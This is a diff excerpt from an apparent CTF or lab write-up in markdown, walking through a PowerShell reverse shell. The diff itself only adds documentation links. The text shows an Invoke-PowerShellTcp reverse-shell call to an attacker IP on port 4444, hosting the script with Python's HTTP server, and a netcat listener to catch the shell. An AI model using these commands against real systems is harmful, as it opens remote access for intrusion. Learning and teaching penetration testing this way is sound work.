michaelyamout/writeups/index.md

 ```markdown
 Invoke-PowerShellTcp -Reverse -IPAddress 10.10.10.10 -Port 4444
 ```
 Great, our script is ready to go!
-Let's host it on our attacker machine utilizing either SimpleHTTPServer or http.server (either will work).
+Let's host it on our attacker machine utilizing either <a href="https://docs.python.org/2.7/library/simplehttpserver.html?highlight=simplehttpserver#module-SimpleHTTPServer">SimpleHTTPServer</a> or <a href="https://docs.python.org/3/library/http.server.html">http.server</a> (either will work).

 ```markdown
 python -m SimpleHTTPServer 8080
 or
 python3 -m http.server 8080
 ```
 Our attacker machine is now hosting 'Invoke-PowerShellTcp.ps1' on our IP address on port 8080.
 Once downloaded and executed by our target it will send a reverse shell to our attacker machine.
-We will catch this reverse shell utilizing Netcat.
+We will catch this reverse shell utilizing <a href="https://www.sans.org/security-resources/sec560/netcat_cheat_sheet_v1.pdf">Netcat</a>.
 To do this, execute the below command and ensure that the port listed in this command is the same declared at the bottom of our Invoke-PowerShellTcp.ps1 script from earlier.

 ```markdown
 nc -lvnp 4444